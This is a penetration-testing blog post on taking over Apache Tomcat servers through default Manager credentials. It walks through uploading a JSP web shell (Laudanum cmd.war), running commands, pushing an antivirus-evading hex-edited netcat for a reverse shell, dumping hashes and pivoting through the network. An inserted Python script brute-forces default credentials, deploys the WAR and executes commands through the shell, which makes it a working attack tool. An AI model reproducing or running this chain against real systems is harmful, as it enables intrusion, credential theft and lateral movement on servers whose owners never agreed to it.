Apache Tomcat is a widely used open source servlet container that runs Java Servlets and JavaServer Pages (JSP). It is often deployed with default or weak credentials protecting the web-accessible Tomcat Manager application. Tomcat Manager allows administrators (and attackers) to upload and deploy Web application ARchive (WAR) files remotely.
A very common initial foothold is to take advantage of weak or default Tomcat Manager credentials and use them to remotely deploy and execute a payload, giving the attacker a backdoor on the host.
Vulnerability scanners will report this particular finding as:
- McAfee Vulnerability Manager (MVM): Tomcat Manager Default Or Blank Login Password
- Nessus: Apache Tomcat Manager Common Administrative Credentials
The Metasploit module exploit/multi/http/tomcat_mgr_deploy (tomcat_mgr_deploy) is the de facto exploit for this vulnerability and is usually rock solid; however, I have seen a few occasions where it fails with little or no explanation. Additionally, the host may have A/V or HIPS that catches the payload, so it may be necessary to upload a custom binary (or some other special treat) manually instead of having MSF deploy it. The steps below are one possible manual workaround for when you don't have the time to troubleshoot the issue.
Assess the situation
In my scenario:
- Windows 7 (32-bit) development box
- Default Tomcat manager credentials running on port 8081
- UAC enabled
- Tried setting target 2 (for Windows) and got a "500 Internal Server Error" with every payload (frustrating)
- Tried the automatic target and the Java payloads; nothing worked
The steps and screenshots below illustrate how to deploy an alternative shell and offer a few ideas of what to do next. Note: these are only ideas; your plan of attack may differ depending on the circumstances.
Download and extract an alternative shell
Download the Laudanum files (which include the cmd.war file) from here:
According to the SourceForge page:
“Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments. They provide functionality such as shell, DNS query, LDAP retrieval and others.”
Extract and understand the code
It is always best practice to try to understand the code. Even if you are not familiar with the language, use Google and work out what the code is doing to the best of your ability. It will help you use the tool effectively and may reveal limitations or areas of concern (for example, which request parameter the shell reads its command from, and the fact that nothing restricts who can reach it once it is deployed).
Upload the cmd.war
Upload the cmd.war file to the remote server through the "WAR file to deploy" section of the Manager page, shown in the screenshot below. The Manager deploys the application under a context path matching the WAR file name, so cmd.war becomes /cmd.
Utilize the JSP shell
Use the shell (found at /cmd/cmd.jsp) to run various situational-awareness commands.
Remember that many commands you are used to running are built into the command shell and are not individual binaries, such as dir. In this case, run them by prefixing "cmd.exe /c [whatever]" (as shown below).
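The credential check that the scanners above flag, the WAR deployment, and the "cmd.exe /c" wrapping can all be driven without the browser through the Manager's text interface. The script below is an added example written for this page, not the article's own tooling and not part of Laudanum. Everything in it is assumed rather than taken from the original: the host and port, the credential list, that the account carries the manager-script role (on Tomcat 7 and later the HTML form needs manager-gui plus a CSRF nonce, while the text API needs manager-script and answers 403 without it, even when the password is right), and that the deployed JSP reads its command from a query parameter named cmd, which you should confirm by reading the shell's source as advised above.

```python
"""Added example (not the article's or Laudanum's code): find a working
Tomcat Manager credential pair, deploy a WAR through the text interface,
and call the deployed JSP shell.  Host, port, credential list, the
manager-script role and the `cmd` parameter name are all assumptions."""
import base64
import urllib.error
import urllib.parse
import urllib.request

# Constructed list of well-known default pairs; extend from your own wordlist.
DEFAULT_CREDS = [
    ("admin", "admin"),
    ("tomcat", "tomcat"),
    ("tomcat", "s3cret"),
    ("admin", ""),
    ("tomcat", ""),
]


def basic_auth(user, password):
    """HTTP Basic header value for the Manager's realm."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return "Basic " + token


def http_send(req, timeout=10):
    """Send a request and return (status, body); 4xx/5xx are returned, not raised."""
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def try_credentials(base, creds, send=http_send):
    """Return (user, password, status) for the first pair the Manager accepts.

    /manager/text/list is cheap and has no side effects.  A 403 still means
    the password was right (the account only lacks manager-script), so it
    is reported as a hit rather than skipped.
    """
    for user, password in creds:
        req = urllib.request.Request(f"{base}/manager/text/list")
        req.add_header("Authorization", basic_auth(user, password))
        status, _ = send(req)
        if status in (200, 403):
            return user, password, status
    return None


def build_deploy_request(base, context_path, war_bytes, user, password):
    """PUT the WAR body to /manager/text/deploy?path=<ctx>&update=true."""
    query = urllib.parse.urlencode({"path": context_path, "update": "true"})
    req = urllib.request.Request(
        f"{base}/manager/text/deploy?{query}", data=war_bytes, method="PUT"
    )
    req.add_header("Authorization", basic_auth(user, password))
    req.add_header("Content-Type", "application/octet-stream")
    return req


def classify_manager_response(status, body):
    """Turn the text API's answer into the next thing a tester should do."""
    if status == 401:
        return "bad credentials"
    if status == 403:
        return "password accepted but no manager-script role; use the HTML upload form"
    if status == 404:
        return "manager application not deployed, or mounted elsewhere"
    if body.startswith("OK"):
        return "deployed"
    if body.startswith("FAIL"):
        return "manager refused: " + body.strip()
    return f"unexpected HTTP {status}"


def shell_command(cmd):
    """dir, type, copy and friends are cmd.exe builtins, not binaries: wrap them."""
    return f"cmd.exe /c {cmd}"


def build_shell_request(base, context_path, jsp_name, command):
    """GET the deployed JSP (context path equals the WAR name, e.g. /cmd/cmd.jsp)."""
    query = urllib.parse.urlencode({"cmd": command})  # parameter name is assumed
    return urllib.request.Request(f"{base}{context_path}/{jsp_name}?{query}")


if __name__ == "__main__":
    import sys
    base = sys.argv[1] if len(sys.argv) > 1 else "http://192.0.2.10:8081"
    war_path = sys.argv[2] if len(sys.argv) > 2 else "cmd.war"
    found = try_credentials(base, DEFAULT_CREDS)
    if not found:
        sys.exit("no default credentials accepted")
    user, password, status = found
    print(f"login ok: {user}:{password!r} (HTTP {status})")
    with open(war_path, "rb") as fh:
        war = fh.read()
    status, body = http_send(build_deploy_request(base, "/cmd", war, user, password))
    print(classify_manager_response(status, body))
    if body.startswith("OK"):
        req = build_shell_request(base, "/cmd", "cmd.jsp", shell_command("whoami & dir C:\\"))
        print(http_send(req)[1])
```

The list call is used for the credential check because it changes nothing on the server; the deploy call is only made once a pair is accepted. If the text interface returns 403 for a pair that the Manager's HTML page accepts in the browser, the account has manager-gui but not manager-script, and you are back to the form upload described above.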
Get file transfer capabilities
Luckily the developer had enabled the TFTP client on this Windows 7 host. Wooot!
Upgrade your shell
We could not get a Meterpreter shell to execute for some reason. I believe this had to do with UAC and the particular user's permissions. So we settled for a hex-edited netcat (edited so that the A/V signatures mentioned earlier no longer match it), which is a step up from the JSP shell.
To transfer (push the alternate backdoor, the hex-edited netcat, to the remote host):
Start the listener and receive the callback (the first command starts a local listener; the second is executed on the remote host and connects back to it):
Get creative
This pivot host can now be used to attack not only the host itself but also other systems on the network. You are limited only by the privileges you can gain and your own imagination. For example, you could upload gsecdump to dump hashes, FPipe to port-forward other protocols past firewalls, or use native Windows commands to mine data and propagate to other hosts. Not the sexiest hack, but it is quite effective.
This article and hack used and expanded on an idea from the following blog entry (props and thanks to the author):